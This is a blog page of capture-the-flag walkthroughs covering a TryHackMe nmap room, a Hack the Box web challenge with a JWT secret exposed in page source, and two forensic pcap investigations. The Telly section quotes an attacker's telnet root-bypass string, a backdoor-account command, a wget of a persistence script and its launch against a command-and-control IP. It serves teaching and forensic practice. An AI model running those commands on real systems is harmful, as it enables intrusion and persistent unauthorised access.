Pete on Software – Pete on Software

Capture the Flag

TryHackMe Walkthrough: Intermediate Nmap

We’re going to break up our Hack the Box streak and switch over to doing a TryHackMe challenge this time called Intermediate Nmap. It is a premium room, which means that you have to be a subscriber to play along. If you aren’t a subscriber and you aren’t interested in becoming one, hopefully you can follow along and still learn or reinforce your learning with this walkthrough.

Here’s the description:
You’ve learned some great nmap skills! Now can you combine that with other skills with netcat and protocols, to log in to this machine and find the flag? This VM is listening on a high port, and if you connect to it it may give you some information you can use to connect to a lower port commonly used for remote access!

There is only one thing to answer for this room and it turns out that all they want is a flag. So let’s get after it. You can se the AttackBox or your own machine. I’m using my own Kali VM here, so I’ve downloaded my openvpn config file and I connect like this

sudo openvpn ~/Downloads/ThmPremium.ovpn

In my case, the IP of the machine is 10.64.156.76, so the first thing I do is give it enough time and then make sure that a) it is up and b) that I can see it through my VPN connection (this isn’t always a guarantee and I’ve had to get a newer config file in the past and reconnect and try again). After seeing some responses from the ping, I hit CTRL-C to stop it and move on

$ ping 10.64.156.76
PING 10.64.156.76 (10.64.156.76) 56(84) bytes of data.
64 bytes from 10.64.156.76: icmp_seq=1 ttl=62 time=67.8 ms
64 bytes from 10.64.156.76: icmp_seq=2 ttl=62 time=89.0 ms
64 bytes from 10.64.156.76: icmp_seq=3 ttl=62 time=73.8 ms
64 bytes from 10.64.156.76: icmp_seq=4 ttl=62 time=50.8 ms
^C
--- 10.64.156.76 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 50.790/70.361/89.006/13.682 ms

The next step is to run an nmap scan. They told us that there is a high port available as a hint. So, I’m not going to play around and I’m going to start by checking all TCP ports (-p-). This can take longer, especially when you are on a VPN instead of the AttackBox, but I don’t mind. The -T4 helps speed it up and I don’t mind waiting. As it is, this came back in about 13 seconds for me. The –sCV tells nmap to run default scripts (C) and to try to determine versions (V) of the services running.

$ nmap -sCV -p- -T4 10.64.156.76 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-25 12:13 -0400
Nmap scan report for 10.64.156.76
Host is up (0.031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7d:dc:eb:90:e4:af:33:d9:9f:0b:21:9a:fc:d5:77:f2 (RSA)
|   256 83:a7:4a:61:ef:93:a3:57:1a:57:38:5c:48:2a:eb:16 (ECDSA)
|_  256 30:bf:ef:94:08:86:07:00:f7:fc:df:e8:ed:fe:07:af (ED25519)
2222/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0b:8d:7c:be:ac:e7:ae:f5:29:c5:61:eb:fa:c1:93:c2 (RSA)
|   256 3d:16:86:a3:ee:9d:3a:8b:d1:00:3a:70:d2:20:e5:d9 (ECDSA)
|_  256 c1:fa:11:55:97:53:bb:a5:0b:8a:61:c0:12:60:ad:52 (ED25519)
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     In case I forget - user:pass
|_    ubuntu:Dafdas!!/str0ng
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.99%I=7%D=6/25%Time=6A3D53BA%P=x86_64-pc-linux-gnu%r(N
SF:ULL,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/st
SF:r0ng\n\n")%r(GetRequest,35,"In\x20case\x20I\x20forget\x20-\x20user:pass
SF:\nubuntu:Dafdas!!/str0ng\n\n")%r(SIPOptions,35,"In\x20case\x20I\x20forg
SF:et\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(GenericLines,35,"I
SF:n\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n"
SF:)%r(HTTPOptions,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu
SF::Dafdas!!/str0ng\n\n")%r(RTSPRequest,35,"In\x20case\x20I\x20forget\x20-
SF:\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(RPCCheck,35,"In\x20case\x
SF:20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(DNSVers
SF:ionBindReqTCP,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:D
SF:afdas!!/str0ng\n\n")%r(DNSStatusRequestTCP,35,"In\x20case\x20I\x20forge
SF:t\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(Help,35,"In\x20case
SF:\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(SSLSe
SF:ssionReq,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas
SF:!!/str0ng\n\n")%r(TerminalServerCookie,35,"In\x20case\x20I\x20forget\x2
SF:0-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(TLSSessionReq,35,"In\x2
SF:0case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(
SF:Kerberos,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas
SF:!!/str0ng\n\n")%r(SMBProgNeg,35,"In\x20case\x20I\x20forget\x20-\x20user
SF::pass\nubuntu:Dafdas!!/str0ng\n\n")%r(X11Probe,35,"In\x20case\x20I\x20f
SF:orget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(FourOhFourReque
SF:st,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str
SF:0ng\n\n")%r(LPDString,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\n
SF:ubuntu:Dafdas!!/str0ng\n\n")%r(LDAPSearchReq,35,"In\x20case\x20I\x20for
SF:get\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(LDAPBindReq,35,"I
SF:n\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n"
SF:)%r(LANDesk-RC,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:
SF:Dafdas!!/str0ng\n\n")%r(TerminalServer,35,"In\x20case\x20I\x20forget\x2
SF:0-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.83 seconds

So, interesting. I see 3 ports open: 22 (running SSH), 2222 (running SSH), and 31337 (service unrecognized despite returning data) that tells us, “In case I forget – user:pass ubuntu:Dafdas!!/str0ng”

I decided to netcat directly to port 31337 and I just got that message and then the connection was closed. So that is seemingly all there is to find from that port.

$ nc 10.64.156.76 31337         
In case I forget - user:pass
ubuntu:Dafdas!!/str0ng

Okay. Well, we have 2 ports open with SSH, let’s try them in order.

$ ssh ubuntu@10.64.156.76                 
The authenticity of host '10.64.156.76 (10.64.156.76)' can't be established.
ED25519 key fingerprint is: SHA256:8VuYGtc5lO2sXK+MVsdbgQV9nF+EVHf8wJcrMAEWg10
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.64.156.76' (ED25519) to the list of known hosts.
ubuntu@10.64.156.76's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.13.0-1014-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

$

That worked. When I try port 2222, I get rejected immediately for not providing a public key.

$ ssh ubuntu@10.64.156.76 -p 2222
The authenticity of host '[10.64.156.76]:2222 ([10.64.156.76]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:31v1b7mqLgFtZOZP/4qvBzUw5AzWmecr4m6GLPgDRJs
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.64.156.76]:2222' (ED25519) to the list of known hosts.
ubuntu@10.64.156.76: Permission denied (publickey).

So, let’s keep working in that port 22 connection.

$ ls
$ pwd
/home/ubuntu
$ ls -la
total 28
drwxr-xr-x 1 ubuntu ubuntu 4096 Jun 25 16:18 .
drwxr-xr-x 1 root   root   4096 Mar  2  2022 ..
-rw-r--r-- 1 ubuntu ubuntu  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 ubuntu ubuntu 3771 Feb 25  2020 .bashrc
drwx------ 2 ubuntu ubuntu 4096 Jun 25 16:18 .cache
-rw-r--r-- 1 ubuntu ubuntu  807 Feb 25  2020 .profile
$ find / -name flag.txt 2>/dev/null                
/home/user/flag.txt
$ cat /home/user/flag.txt
flag{251f309497a18888dde5222761ea88e4}

So, I expected to find a flag in the directory. There wasn’t one. So I checked where I landed and it was /home/ubutu, as I figured. So, I checked for hidden contents and there was nothing really there. Lastly, I took a shot and just searched the entire computer for a file named flag.txt (piping errors to /dev/null). If that came up with nothing, my next step would have been to look for user.txt, which is another popular flag file name. But, that proved not to be necessary, and I found the file and was able to cat its contents to the screen and finish the challenge. Pretty light work, but a good exercise in some of the just-beyond-basic-but-not-a-whole-lot uses of nmap.

Any questions or comments, let me know.

Capture the Flag

Hack the Box Walkthrough: OpenSecret

Today, we’re going to tackle a Hack the Box Challenge called OpenSecret. Unlike the last few of these I’ve done, this is more of an offensive security challenge. Our challenge scenario is

A simple help desk portal where users can submit support tickets. The application uses JWT tokens for session management, but something seems off about how they’re implemented. Can you find the security flaw?

Task 1: Submit challenge Flag

After starting the challenge, you’ll be given a public IP to hit on a specific port, so no VPN access is required. For me, that IP:Port is 154.57.164.83:30250. Given the nature of the challenge (and that it is under the Category of “Web”), I know it will be a web application. Regardless, I did an nmap scan on just that port at that IP so I could know a little bit about it and it seems that this is a Node.js/Express application.

$ nmap -sCV -vv -p 30250 154.57.164.83                 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-14 13:19 -0400
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Initiating Ping Scan at 13:19
Scanning 154.57.164.83 [4 ports]
Completed Ping Scan at 13:19, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:19
Completed Parallel DNS resolution of 1 host. at 13:19, 0.49s elapsed
Initiating SYN Stealth Scan at 13:19
Scanning 154-57-164-83.static.isp.htb.systems (154.57.164.83) [1 port]
Discovered open port 30250/tcp on 154.57.164.83
Discovered open port 30250/tcp on 154.57.164.83
Completed SYN Stealth Scan at 13:19, 0.24s elapsed (1 total ports)
Initiating Service scan at 13:19
Scanning 1 service on 154-57-164-83.static.isp.htb.systems (154.57.164.83)
Completed Service scan at 13:19, 11.45s elapsed (1 service on 1 host)
NSE: Script scanning 154.57.164.83.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 5.13s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.75s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Nmap scan report for 154-57-164-83.static.isp.htb.systems (154.57.164.83)
Host is up, received reset ttl 128 (0.028s latency).
Scanned at 2026-05-14 13:19:09 EDT for 17s

PORT      STATE SERVICE REASON          VERSION
30250/tcp open  http    syn-ack ttl 128 Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: OpenSecret Helpdesk - Support Portal

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.39 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (128B)

Navigating to the site, we see this

Given the description, I checked to see if there are any JWTs in storage already in the browser. I checked Cache Storage, Cookies, Indexed DB, Local Storage, and Session Storage, but nothing is there yet. Okay, I don’t see any other links, so I submitted the form with a name, email, and some pretend issue description words. Nothing fancy, no XSS attempts, etc. When I do, it tells me that no session token is provided.

Looking at the network call there, I just see this payload and these headers. No Cookies sent, and I don’t see an Auth Header.

{"name":"Bob Smith","description":"Blah blah blah.  All you ever do is say blah like things."}

Here is the response.

{"message":"No session token provided"}

So I need to see how this is being packaged up, so I take a look at the HTML source and … well, I guess the challenge is over. There is nothing really interesting in the HTML source until you get to the script tag at the end.

 <script>
    // JWT Secret Key
    const SECRET_KEY = "HTB{0p3n_s3cr3ts_ar3_n0t_s3cr3ts}";

    // Helper function to convert string to Base64URL
    function base64url(str) {
        return btoa(str)
            .replace(/\+/g, "-")
            .replace(/\//g, "_")
            .replace(/=/g, "");
    }

    // Generate a JWT session token for the user
    async function generateJWT() {
        // Check if user already has a token
        const existingToken = document.cookie
            .split("; ")
            .find((row) => row.startsWith("session_token="));

        if (existingToken) {
            console.log("Session token already exists");
            return;
        }

        // Create a random guest username
        const username = "guest_" + Math.floor(Math.random() * 10000);

        // JWT Header
        const header = { alg: "HS256", typ: "JWT" };

        // JWT Payload
        const payload = { username: username };

        // Encode header and payload
        const encodedHeader = base64url(JSON.stringify(header));
        const encodedPayload = base64url(JSON.stringify(payload));
        const data = encodedHeader + "." + encodedPayload;

        // Sign with SECRET_KEY using HMAC-SHA256
        const key = await crypto.subtle.importKey(
            "raw",
            new TextEncoder().encode(SECRET_KEY),
            { name: "HMAC", hash: "SHA-256" },
            false,
            ["sign"]
        );

        const signature = await crypto.subtle.sign(
            "HMAC",
            key,
            new TextEncoder().encode(data)
        );

        // Encode signature
        const encodedSignature = base64url(
            String.fromCharCode(...new Uint8Array(signature))
        );

        // Complete JWT token
        const token = data + "." + encodedSignature;

        // Store token in cookie
        document.cookie = `session_token=${token}; path=/; max-age=86400`;

        console.log("Generated session for:", username);
    }

    // Generate JWT token on page load
    generateJWT();

    // Handle ticket submission
    document
        .getElementById("submit-btn")
        .addEventListener("click", async (event) => {
            event.preventDefault();

            const name = document.getElementById("ticket-name").value;
            const description =
                document.getElementById("ticket-desc").value;

            const response = await fetch("/submit-ticket", {
                method: "POST",
                headers: {
                    "Content-Type": "application/json",
                },
                body: JSON.stringify({ name, description }),
            });

            const result = await response.json();
            document.getElementById("message-display").textContent =
                result.message || "Ticket submitted successfully!";
        });
</script>

Task 1 Answer: HTB{0p3n_s3cr3ts_ar3_n0t_s3cr3ts}

That’s all there was to it. We don’t actually have to use that code and that “key” to impersonate anyone, this was just an easy example of the dangers of storing secrets openly (OHHHH, the room name makes so much sense now 😉 )

If you have any questions, let me know!

Capture the Flag

Hack the Box Walkthrough: Telly

Today, we’re going to attack a Hack the Box Sherlock called Telly. You need to download the attached zip and extract it with the password hacktheblue to get started. Here’s our scenario.

You are a Junior DFIR Analyst at an MSSP that provides continuous monitoring and DFIR services to SMBs. Your supervisor has tasked you with analyzing network telemetry from a compromised backup server. A DLP solution flagged a possible data exfiltration attempt from this server. According to the IT team, this server wasn’t very busy and was sometimes used to store backups.

Okay. Let’s get started. Inside the zip is one network capture file, monitoringservice_export_202610AM-11AM.pcapng.

Task 1: What CVE is associated with the vulnerability exploited in the Telnet protocol?

First we’ll search to limit to just telnet traffic, since that’s what they are telling us to focus on. I just put telnet in the search bar and hit enter. These were my results.

Right click on that first packet (No. 47) and select Follow -> TCP Stream. You see this (I’m just showing the first few lines up until access is granted).

..%..&..... ..#..'..$
..%..&..&........ ..#..'..$
.. .....#.....'.........
.. .38400,38400....#.kali:0.0....'..USER.-f root.DISPLAY.kali:0.0......XTERM-256COLOR..
........"........!
........"..".....b........b....	B.
........
............................0.......!
..".....
.."....
..!............"..".............	..
........
.............
Linux 6.8.0-90-generic (backup-secondary) (pts/1)


........"
Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.8.0-90-generic x86_64)

I’m curious about that 4th line, so I’m going to google part of that and see if that is indicative of the attack itself.

That shows us the answer in the AI overview as well as the top search result.

Task 1 Answer: CVE-2026-24061

Task 2: When was the Telnet vulnerability successfully exploited, granting the attacker remote root access on the target machine?

Currently (for me, anyway), my time is being displayed in relative time since packet capture started. If you go to View -> Time Display Format -> UTC Date and Time of Day, it will change and you can see the answer.

Task 2 Answer: 2026-01-27 10:39:28

Task 3: What is the hostname of the targeted server?

If we go back to that TCP stream that we followed starting at packet 47, we can see the entire convo. After access was granted, they were dropped a command prompt with their user and the host: root@backup-secondary.

Task 3 Answer: backup-secondary

Task 4: The attacker created a backdoor account to maintain future access. What username and password were set for that account?

Same stream, we can see the attacker issued these commands

sudo useradd -m -s /bin/bash cleanupsvc; echo "cleanupsvc:YouKnowWhoiam69" | sudo chpasswd

Task 4 Answer: cleanupsvc:YouKnowWhoiam69

Task 5: What was the full command the attacker used to download the persistence script?

This is really just becoming an exercise in how well we understand attacker actions. If we stay in the stream and see what the attacker is doing, we can easily see what they downloaded / how they downloaded it. There is some weird formatting because of the nature of typing and seeing responses and how long they may have delayed while typing, but here is the relevant part. Within the capture, red is what the user entered and blue is the response. That’s why you see it duplicated as they type.

w
w
g
g
e
e
t
t
 
 
.[200~https://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh.[201~

Task 5 Answer: wget https://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh

Task 6: The attacker installed remote access persistence using the persistence script. What is the C2 IP address?

Let’s keep scrolling in the stream and see what else they did. I looked around but nothing jumped out at me immediately. At this point, a lot of the commands were vertical with the repeated characters (one from the input, one from the output) and I wasn’t seeing it. So I looked into that script that we saw being run from here. Inside that script, we see this:

EXAMPLES="Examples:

\e[33mPrint\e[0m Commands that can be used to install persistence (assumes -d): bash linper.sh -i 192.168.1.2 -p 4444 --print

So we are looking for this script to be called with a -i and then the address. Looking for that, I found this part:

bash linper.sh --enum-defenses
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
i
i
 
 
.[200~91.99.25.54.[201~
.[7m91.99.25.54.[27m
.[C
............91.99.25.54
 
 
-
-
p
p
 
 
5
5
9
9

You can see that the command bash linper.sh –enum-defenses -i 91.99.25.54 -p 5599 was called and that gives us our answer.

Task 6 Answer: 91.99.25.54

Task 7: The attacker exfiltrated a sensitive database file. At what time was this file exfiltrated?

As we’ve been getting familiar with this interaction, I’ve read over this stream several times and by this point, I remember seeing this file named credit-cards-25-blackfriday.db being referenced. If you go File -> Export Objects -> HTTP from the Wireshark menu, you see this

We can see that it was exported in packet 9380. If I click that row it takes me to the packet (if you still have the stream filter on, it will take you to 9378 instead… they have the same timestamp to the second, though). I can see the date under the Time column.

Task 7 Answer: 2026-01-27 10:49:54

Task 8: Analyze the exfiltrated database. To follow compliance requirements, the breached organization needs to notify its customers. For data validation purposes, find the credit card number for a customer named Quinn Harris.

Okay, we left the objects to see the timestamp on the packet. Go back in File -> Export Objects -> HTTP, click the db row and click Save at the bottom. Choose somewhere to save it and let’s analyze it.

$ file credit-cards-25-blackfriday.db 
credit-cards-25-blackfriday.db: SQLite 3.x database, last written using SQLite version 3046001, file counter 7, database pages 3, cookie 0x7, schema 4, UTF-8, version-valid-for 7

We can see that it is SQLite, so let’s look further. There only seems to be one table and the only identifier seems to be email. So, I check at first to see if any email has quinn in the name and we find one row and that gives us the answer.

$ sqlite3 credit-cards-25-blackfriday.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
purchases
sqlite> .schema
CREATE TABLE purchases (
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  email TEXT NOT NULL,
  creditcardnumber INTEGER NOT NULL,
  purchase_date TEXT NOT NULL,   -- ISO date: YYYY-MM-DD
  item_purchased TEXT NOT NULL
);
CREATE TABLE sqlite_sequence(name,seq);
sqlite> select * from purchases where email like '%quinn%';
12|quinn.harris@hotmail.com|5312269047781209|2025-12-08|4K monitor

Task 8 Answer: 5312269047781209

And that’s it, we win. That was actually a pretty fun investigation. Let me know if you have any comments or rooms you’d like to see tackled.

Capture the Flag

Hack the Box Walkthrough: Vantage

Today, we’re tackling another Sherlock from HackTheBox called Vantage. You can find the room here. Download the Vantage.zip from the page and use the password hacktheblue to unzip it. Inside, you’ll find 2 .pcap files called controller.2025-07-01.pcap and web-server.2025-07-01.pcap. We will use these to answer the 14 Task Questions on this challenge. It is marked at “very easy”, but this does require some skill to pass it. I admit that my Wireshark querying isn’t the best, so I am really enjoying this opportunity to practice and get better. Our scenario is this:

A small company moved some of its resources to a private cloud installation. The developers left the redirect to the dashboard on their web server. The security team got an email from the alleged attacker stating that the user data was leaked. It is up to you to investigate the situation.

Let’s dig in. I will say that I might not always take the best, most efficient way to find these answers, but I will find them honestly and in a way that hopefully you can repeat. There are some questions when the answer could be found by a little brute force earlier in the process, but I wanted to try to have a methodology that would work in situations where brute force may not be practical (like real life situations).

Task 1: What tool did the attacker use to fuzz the web server ? (Format- include version e.g, nmap@7.80)

Because this question is asking about fuzzing a web server, I started by opening the web-server.2025-07-01.pcap file in Wireshark. To fuzzing, we only care about http traffic. So in the search bar in Wireshark, I just typed http and hit enter. This returned 7482 of the 21650 total packets.

We can see a lot of requests and responses back to back. If we go in the menu to Statistics -> Conversations -> TCP and check the IPv4 tab (there is nothing in IPv6), we see a TON of this traffic is coming from 117.200.21.26 and going to 157.230.81.229.

Next, I applied a filter of http && ip.src == 117.200.21.26 to see what that person is doing. But we need the user agent. You can dig through the packets and find what you want and Right Click -> Apply as Column and you’ll see that value for every request in the table. But this is what I’m REALLY bad at. I know the general makeup for network requests on the wire, but sometimes some things are hard to find. Here’s an easy way to do the same thing. Right Click in the Header of the results and choose Column Preferences.

Then click the Plus sign to add your custom column

A new column will appear titled “New Column” of type “Custom”. If you double click in each cell, you can edit. Change your values to this and click Apply and OK.

This shows you the answer. You can kind of skim down and see the same value over and over again of Fuzz Faster U Fool v2.1.0-dev. The answer wants something with a mask of ****@*.*.*. I happen to know that the popular fuzzing tool ffuf stands for “Fuzz Faster U Fool” (check out my post I did on ffuf for my Core Tools You Should Know series). Using the abbreviation seems to meet that criteria and trying it completes the task.

Task 1 Answer: ffuf@2.1.0

Task 2: Which subdomain did the attacker discover?

For this one, we already know that ffuf was being used to fuzz things. What we care about were times when it returned 200 OK or maybe even a redirect and not 404 Not Found. When I do that (using the IP we discovered above as the destination) with a filter like this

ip.dst  == 117.200.21.26 &&  _ws.col.info == "HTTP/1.1 200 OK  (text/html)"

I get a bunch of results. Most of them have a length of 596.

Let’s look for ones that don’t have that length.

ip.dst  == 117.200.21.26 &&  _ws.col.info == "HTTP/1.1 200 OK  (text/html)" && frame.len != 596

That only gives me 12 and glancing at the first few, they all are hits to http://cloud.vantage.tech and then other paths. So, there we go.

Task 2 Answer: cloud

Task 3: How many login attempts did the attacker make before successfully logging in to the dashboard?

Okay. First, what is the login URL? We’d know already if this was truly ours, but looking at one of the 12 responses, I see a request to http://cloud.vantage.tech/dashboard/auth/login/. So there we go. Let’s dig in there.

ip.dst  == 117.200.21.26 &&  http.request.uri == "/dashboard/auth/login/"

That attacker hitting that URI happened 4 times. 3 of them returned 200 OK and one returned 302 Found. The 302 is the redirect to let them in. That means they failed 3 times.

Task 3 Answer: 3

Task 4: When did the attacker download the OpenStack API remote access config file? (UTC)
So, step one, what even is that? What I do know is that a file was downloaded. If we use Wireshark and choose File -> Export Objects -> HTTP, we get a list of objects in the capture. Since this is a file and not a small HTML file, I clicked the Size header to sort by size descending.

I scrolled down a little and there are 2 packets that are 1941 bytes each that have a filename of openrc. They are packets 21256 and 21260. Looking at those 2 packets, 20707 went from 10.116.0.4 to 10.116.0.3. 20711 went from 157.230.81.229 to our guy at 117.200.21.26. They also have the same timestamp on them, so we win either way. I’m just showing the relevant part under Hypertext Transfer Protocol

Hypertext Transfer Protocol, has 3 chunks (including last chunk)
    HTTP/1.1 200 OK\r\n
        Response Version: HTTP/1.1
        Status Code: 200
        [Status Code Description: OK]
        Response Phrase: OK
    Date: Tue, 01 Jul 2025 09:40:29 GMT\r\n
    Server: Apache/2.4.58 (Ubuntu)\r\n
    Content-Disposition: attachment; filename="admin-openrc.sh"\r\n

Task 4 Answer: 2025-07-01 09:40:29

Task 5: When did the attacker first interact with the API on controller node? (UTC)
Okay, now we switch to opening the controller.2025-07-01.pcap file. I added this filter and found the first HTTP request.

ip.src==117.200.21.26 && http

Within the Frame, we have this and it gives us the answer.

Frame 8490: Packet, 293 bytes on wire (2344 bits), 293 bytes captured (2344 bits)
    Encapsulation type: Linux cooked-mode capture v2 (210)
    Arrival Time: Jul  1, 2025 05:41:44.667723000 EDT
    UTC Arrival Time: Jul  1, 2025 09:41:44.667723000 UTC
    Epoch Arrival Time: 1751362904.667723000

Task 5 Answer: 2025-07-01 09:41:44

Task 6: What is the project id of the default project accessed by the attacker?
This is another one where if people from our company were doing the forensics, we’d already know how to look. But you and I are guessing, so I made an assumption that the URL would have project in it and did this filter

ip.src==117.200.21.26 && http.request.uri contains "project"

That gives me only 5 requests and one looks super obvious. If I right-click on that one and choose Follow -> HTTP Stream we get this, which contains our answer.

GET /identity/v3/projects?domain_id=default&name=admin HTTP/1.1
Host: 134.209.71.220
User-Agent: openstacksdk/4.6.0 keystoneauth1/5.11.1 python-requests/2.32.4 CPython/3.13.5
Accept-Encoding: gzip, deflate
Accept: application/json
Connection: keep-alive
X-Auth-Token: gAAAAABoY67QSl3AarKC9p_FCUhm-zdlkNPcgfqpHncXtnKqPhHgH79XnHa-4IrDf4WlL8QpLiKIQOE8C4kq3Tv21nkTpzMAuGXwLZkEeexqQlLfUtyrhmGjKsFvflRlIEZb0A-1oQZLVzdk1021QkPqjVjFonIEIEBgH0oZll7xE2hp7Scnm2o


HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 09:48:01 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Type: application/json
Content-Length: 476
Vary: X-Auth-Token
x-openstack-request-id: req-14b6f50c-12f4-48f9-be96-898430e4fe66
Connection: close

{"projects": [{"id": "9fb84977ff7c4a0baf0d5dbb57e235c7", "name": "admin", "domain_id": "default", "description": "Bootstrap project for initializing the cloud.", "enabled": true, "parent_id": "default", "is_domain": false, "tags": [], "options": {}, "links": {"self": "http://134.209.71.220/identity/v3/projects/9fb84977ff7c4a0baf0d5dbb57e235c7"}}], "links": {"next": null, "self": "http://134.209.71.220/identity/v3/projects?domain_id=default&name=admin", "previous": null}}

Task 6 Answer: 9fb84977ff7c4a0baf0d5dbb57e235c7

Task 7: Which OpenStack service provides authentication and authorization for the OpenStack API?
I literally just Googled the question. The answer came right up.

Task 7 Answer: keystone

Task 8: What is the endpoint URL of the swift service?
I have no idea what this is either. This is another thing that if you worked for a company (or were even doing an investigation for a company that contracted you), you would have intel on this kind of thing. As it is, I googled it, the AI overview included this

Structure: http://:8080/v1/AUTH_

Okay, so I went into Statistics -> Http -> Requests. I scanned down until I found the part hitting port 8080 with a /V1/Auth pattern and bingo.

Task 8 Answer: http://134.209.71.220:8080/v1/AUTH_9fb84977ff7c4a0baf0d5dbb57e235c7

Task 9: How many containers were discovered by the attacker?
So I did a filter of http.request.uri == “/v1/AUTH_9fb84977ff7c4a0baf0d5dbb57e235c7?format=json”. This gave me 2 results. I right clicked on the first one and chose Follow -> HTTP Stream. I can see that the response back was

[{"name": "dev-files", "count": 0, "bytes": 0, "last_modified": "2025-07-01T04:22:36.008860", "storage_policy": "Policy-0"}, {"name": "employee-data", "count": 0, "bytes": 0, "last_modified": "2025-07-01T04:22:28.334080", "storage_policy": "Policy-0"}, {"name": "user-data", "count": 0, "bytes": 0, "last_modified": "2025-07-01T04:22:07.707130", "storage_policy": "Policy-0"}]

That represents 3 containers: dev-files, employee-data, and user-data.

Task 9 Answer: 3

Task 10: When did the attacker download the sensitive user data file? (UTC)
If we look at the statistics again, we see a download of user-details.csv. If I put the filter to http.request.uri == “/v1/AUTH_9fb84977ff7c4a0baf0d5dbb57e235c7/user-data/user-details.csv” and right click and chose Follow -> HTTP Stream, you can see the time.

HTTP/1.1 200 OK
Content-Type: text/csv
Etag: 2197a57085557424cefc95f85efb7499
Last-Modified: Tue, 01 Jul 2025 04:31:31 GMT
X-Timestamp: 1751344290.17360
Accept-Ranges: bytes
Content-Length: 1367
